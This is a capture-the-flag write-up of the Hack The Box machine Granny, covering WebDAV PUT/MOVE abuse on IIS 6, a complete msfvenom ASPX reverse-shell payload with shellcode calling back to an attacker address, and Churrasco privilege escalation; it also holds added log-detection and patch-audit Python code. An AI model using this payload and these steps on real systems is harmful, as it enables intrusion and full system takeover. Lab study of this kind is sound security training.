TJ_Null’s OSCP Prep – HTB – Granny

This is a Windows box which has a vulnerable IIS webserver running. The webserver allowed different HTTP methods such as PUT, MOVE and PROPFIND, so it was possible to upload a shell. I used davtest, which tries uploading executables and files that can give us remote code execution. To escalate privileges I had to be creative, using an exploit that gave me command injection as NT AUTHORITY\SYSTEM and from there running a payload that granted me a privileged shell.


Enumeration

First, let's start with an Nmap scan.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/granny]
└─# cat nmap.result.nmap 
# Nmap 7.92 scan initiated Sat Jan 15 16:18:20 2022 as: nmap -sC -sV -p- --min-rate 10000 -oA nmap.result 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up (0.034s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|   Server Date: Sat, 15 Jan 2022 21:20:34 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 15 16:18:41 2022 -- 1 IP address (1 host up) scanned in 21.11 seconds

Only port 80 is open. The webserver is IIS httpd 6.0. Under Allowed Methods and Public Options you can see all the HTTP methods we could use. The PUT method would allow us to upload a file, possibly a reverse shell.

We will use davtest to test WebDAV to see what kind of files we’re allowed to upload.

DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

https://www.kali.org/tools/davtest/

But first, to understand what's happening, let's open up Burp Suite and create a redirect.

This will bind port 80 to our loopback address (localhost, 127.0.0.1) and redirect the traffic to port 80 on 10.10.10.15.

┌──(root💀kali)-[/home/…/Desktop/HTB/granny/iis6-exploit-2017-CVE-2017-7269]
└─# davtest -url http://10.10.10.15
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.15
********************************************************
NOTE    Random string for this session: uGPP82XIK
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://10.10.10.15/DavTestDir_uGPP82XIK
********************************************************
 Sending test files
PUT     cfm     SUCCEED:        http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.cfm
PUT     aspx    FAIL
PUT     jhtml   SUCCEED:        http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.jhtml
PUT     cgi     FAIL
PUT     jsp     SUCCEED:        http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.jsp
PUT     php     SUCCEED:        http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.php
PUT     asp     FAIL
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.html
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.txt
PUT     pl      SUCCEED:        http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.pl
PUT     shtml   FAIL
********************************************************
 Checking for test file execution
EXEC    cfm     FAIL
EXEC    jhtml   FAIL
EXEC    jsp     FAIL
EXEC    php     FAIL
EXEC    html    SUCCEED:        http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.html
EXEC    txt     SUCCEED:        http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.txt
EXEC    pl      FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_uGPP82XIK
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.cfm
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.jhtml
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.jsp
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.php
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.html
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.txt
PUT File: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.pl
Executes: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.html
Executes: http://10.10.10.15/DavTestDir_uGPP82XIK/davtest_uGPP82XIK.txt

Unfortunately we're not allowed to PUT an .aspx file on the webserver; however, we're allowed to use the HTTP MOVE method. So we can upload a payload with an .html extension and move it to an .aspx extension. I'll use Burp Suite for that.

Initial access

First, let's test using the PUT method.

That worked. So now let's generate an msfvenom payload, upload it to the webserver, move it to an .aspx extension and visit the page.

┌──(root💀kali)-[/usr/share/nmap/scripts]
└─# msfvenom -p windows/shell_reverse_tcp -f aspx lhost=10.10.14.17 lport=4444             
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2729 bytes
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
    private static Int32 MEM_COMMIT=0x1000;
    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);

    [System.Runtime.InteropServices.DllImport("kernel32")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);

    protected void Page_Load(object sender, EventArgs e)
    {
        byte[] fC1 = new byte[324] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,
0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,
0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,
0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,
0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x0a,0x0a,0x0e,0x11,0x68,0x02,0x00,0x11,0x5c,0x89,
0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,
0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,0x24,
0x3c,0x01,0x01,0x8d,0x44,0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56,0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,
0x3f,0x86,0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,
0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5 };

        IntPtr fWWG4NkmQz_Q = VirtualAlloc(IntPtr.Zero,(UIntPtr)fC1.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        System.Runtime.InteropServices.Marshal.Copy(fC1,0,fWWG4NkmQz_Q,fC1.Length);
        IntPtr zjgG_tR3RI2 = IntPtr.Zero;
        IntPtr r7uxHqKE = CreateThread(IntPtr.Zero,UIntPtr.Zero,fWWG4NkmQz_Q,IntPtr.Zero,0,ref zjgG_tR3RI2);
    }
</script>

PUT payload in /aghanim.html

MOVE /aghanim.html to /aghanim1.aspx

And now when we visit http://10.10.10.15/aghanim1.aspx, our netcat listener will have a connection.
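From the defender's side, the PUT-then-MOVE-then-GET sequence above is visible in the IIS W3C logs even though the MOVE Destination header is not logged by default. The following is an added example, not code from the writeup: it parses constructed IIS 6 W3C log lines (the field layout is the default one; the sample requests mirror the davtest run and the .html-to-.aspx rename above) and flags every WebDAV write method, plus any client that completes a write and then requests a script-extension URL.

```python
"""Flag WebDAV write activity in IIS W3C extended log lines.

Added illustration with constructed sample data; not part of the original
writeup. The field list follows the default IIS W3C format, and the detection
routine (find_webdav_abuse) is a hypothetical one written for this example.
"""
from collections import defaultdict

# WebDAV methods that create, rename or remove content on the server.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH", "LOCK", "UNLOCK"}
# Extensions IIS 6 hands to a script engine; a GET for one of these from a
# client that just completed a write is the pattern shown in the writeup.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".asmx", ".ashx")

# Constructed sample log: an OPTIONS/MKCOL/PUT probe, a refused PUT of .aspx,
# then the successful PUT .html, MOVE, and GET of the renamed .aspx.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2022-01-15 21:20:34 10.10.10.15 GET / - 80 - 10.10.14.17 Mozilla/5.0 200 0 0
2022-01-15 21:21:02 10.10.10.15 OPTIONS / - 80 - 10.10.14.17 DAV-Test 200 0 0
2022-01-15 21:21:05 10.10.10.15 MKCOL /DavTestDir_uGPP82XIK - 80 - 10.10.14.17 DAV-Test 201 0 0
2022-01-15 21:21:06 10.10.10.15 PUT /DavTestDir_uGPP82XIK/davtest_uGPP82XIK.aspx - 80 - 10.10.14.17 DAV-Test 403 0 0
2022-01-15 21:25:10 10.10.10.15 PUT /aghanim.html - 80 - 10.10.14.17 Mozilla/5.0 201 0 0
2022-01-15 21:25:20 10.10.10.15 MOVE /aghanim.html - 80 - 10.10.14.17 Mozilla/5.0 201 0 0
2022-01-15 21:25:30 10.10.10.15 GET /aghanim1.aspx - 80 - 10.10.14.17 Mozilla/5.0 200 0 0
2022-01-15 21:26:00 10.10.10.15 GET /index.html - 80 - 10.10.13.5 Mozilla/5.0 200 0 0
"""


def parse_w3c(text):
    """Turn W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, records = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # field names follow the directive
            continue
        if line.startswith("#"):
            continue                     # other directives (#Software, #Date, ...)
        values = line.split()
        if len(values) != len(fields):
            continue                     # malformed or truncated line, skip it
        records.append(dict(zip(fields, values)))
    return records


def find_webdav_abuse(records):
    """Return (write_events, alerts).

    write_events: every request using a WebDAV write method, with its status.
    alerts: clients that completed a write (2xx) and afterwards requested a
            script-extension URL, i.e. the upload-rename-execute pattern.
    """
    write_events, alerts = [], []
    wrote = defaultdict(list)            # client ip -> URI stems written successfully
    for r in records:
        method, stem, client, status = r["cs-method"], r["cs-uri-stem"], r["c-ip"], r["sc-status"]
        if method in WRITE_METHODS:
            write_events.append((client, method, stem, status))
            if status.startswith("2"):
                wrote[client].append(stem)
        elif method == "GET" and stem.lower().endswith(SCRIPT_EXTENSIONS) and wrote.get(client):
            alerts.append({"client": client, "executed": stem, "after_writes": list(wrote[client])})
    return write_events, alerts


if __name__ == "__main__":
    writes, hits = find_webdav_abuse(parse_w3c(SAMPLE_LOG))
    for w in writes:
        print("write  :", w)
    for h in hits:
        print("ALERT  :", h)
```

Even a refused PUT (the 403 on the .aspx probe) is worth surfacing: it shows a client enumerating what the server will accept, which is exactly what davtest does before any payload is placed.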

Privilege Escalation

I'll use Windows Exploit Suggester. To use it I have to run systeminfo on the target and copy the output to my local attacker machine, so there is no need to transfer a payload to the target.

From the output below we can see that this is a Windows Server 2003 Service Pack 2 build 2003. The system architecture is x86.

systeminfo

Host Name:                 GRANNY
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 0 Hours, 5 Minutes, 12 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1999 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 802 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,338 MB
Page File: In Use:         132 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A

And running Windows Exploit Suggester:

┌──(root💀kali)-[/opt/Windows-Exploit-Suggester]
└─# python2 windows-exploit-suggester.py --systeminfo sys.txt -d 2022-01-14-mssb.xls 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*] 
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*]   http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*] 
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]   http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*]   http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*]   http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*] 
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*]   http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*] 
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]   https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]   https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*] 
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]   http://www.exploit-db.com/exploits/34458/
[*] 
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*] 
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done   
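What the Suggester does in its first step is to read the systeminfo dump, derive the platform ("Windows 2003 SP2 32-bit") and the installed hotfix list, and then compare that list against the KB numbers of the bulletins for that platform. The block below is an added example of that comparison, written for this page and not code from the writeup or from Windows-Exploit-Suggester. The systeminfo excerpt is taken from the output above, and the bulletin table is a constructed, deliberately tiny subset whose KB numbers are the ones printed in parentheses in the Suggester output (MS15-051, MS14-070, MS14-068); a real check uses the full bulletin spreadsheet.

```python
"""Parse `systeminfo` output and report bulletins whose KB is not installed.

Added example, not code from the writeup or from Windows-Exploit-Suggester.
BULLETINS is a constructed three-entry subset of the real bulletin database.
"""
import re

# Excerpt of the systeminfo output shown in the writeup (constructed sample input).
SAMPLE_SYSTEMINFO = """\
Host Name:                 GRANNY
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1999 Mhz
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A
"""

# bulletin -> (KB article number, platform tag). KB numbers from the Suggester output above.
BULLETINS = {
    "MS15-051": ("3057191", "Windows 2003 SP2 32-bit"),
    "MS14-070": ("2989935", "Windows 2003 SP2 32-bit"),
    "MS14-068": ("3011780", "Windows 2003 SP2 32-bit"),
}


def parse_systeminfo(text):
    """Return a dict of 'Key: value' pairs plus a 'hotfixes' list of bare KB numbers."""
    info = {"hotfixes": []}
    in_hotfixes = False
    for line in text.splitlines():
        m = re.match(r"^(\S[^:]*):\s*(.*)$", line)
        if m:                                   # a new "Key: value" line
            key, value = m.group(1).strip(), m.group(2).strip()
            in_hotfixes = key.startswith("Hotfix")
            if not in_hotfixes:
                info[key] = value
            continue
        if in_hotfixes:                         # indented "[01]: KB..." / "Q..." continuation lines
            m = re.search(r"\[\d+\]:\s*(?:KB|Q)?(\d+)", line)
            if m:
                info["hotfixes"].append(m.group(1))
    return info


def platform_tag(info):
    """Map OS Version / System Type to a tag like 'Windows 2003 SP2 32-bit'.

    Simplification for this example: NT 5.2 is treated as Windows 2003 and
    anything without 'x64' in System Type as 32-bit.
    """
    m = re.search(r"^(\d+)\.(\d+)\.\d+\s+Service Pack (\d+)", info.get("OS Version", ""))
    name = "Windows 2003" if m and (m.group(1), m.group(2)) == ("5", "2") else "unknown"
    sp = f"SP{m.group(3)}" if m else "SP?"
    arch = "64-bit" if "x64" in info.get("System Type", "") else "32-bit"
    return f"{name} {sp} {arch}"


def missing_bulletins(info, bulletins=BULLETINS):
    """Bulletins for this platform whose KB does not appear in the hotfix list."""
    tag = platform_tag(info)
    installed = set(info["hotfixes"])
    return sorted(b for b, (kb, plat) in bulletins.items() if plat == tag and kb not in installed)


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(platform_tag(parsed), "hotfixes:", parsed["hotfixes"])
    print("missing:", missing_bulletins(parsed))
```

With a single NT-era hotfix installed, every bulletin in the table comes back as missing, which is the same conclusion the Suggester output above reaches at scale: the patch level, not any one bug, is the finding to report.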

In the output above you get a list of many vulnerabilities because the system is unpatched. I will use this exploit to try and elevate my privileges: https://www.exploit-db.com/exploits/6705

Basically if you can run code under any service in Win2k3 then you can own Windows; this is because Windows service accounts can impersonate. Other processes (not services) that can impersonate are IIS 6 worker processes, so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recommend not allowing users to run this kind of code from ASP.

https://www.exploit-db.com/exploits/6705

The Churrasco exploit is provided as an exe file I can use.

So first I download the exe file to my attacker machine, spin up smbserver.py and run the exe file on the target machine.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/granny]
└─# smbserver.py share /home/aghanim/Desktop/HTB/granny/
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

So we can run commands using churrasco.exe as Administrator. I tried to add a user and put this user in the local admin group. For some reason I didn't get it to work, so I opted for another solution.

Since I can run commands as NT AUTHORITY\SYSTEM, I can probably also run programs with the same privilege. So I created a new payload using msfvenom and copied it to the target machine.

And we have a shell as NT AUTHORITY\SYSTEM.

What I’ve learned

  • An insecure webserver configuration that allows different HTTP methods (PUT, MOVE and so on) can result in RCE.
  • To see what a script is sending to a webserver, we can use Burp to create a redirect from loopback to the webserver, intercepting all traffic.
  • Many of the privilege escalation methods I tried did not work, and being creative with the tools you have can give you privilege escalation. As someone said before, privilege escalation is more art than technique.
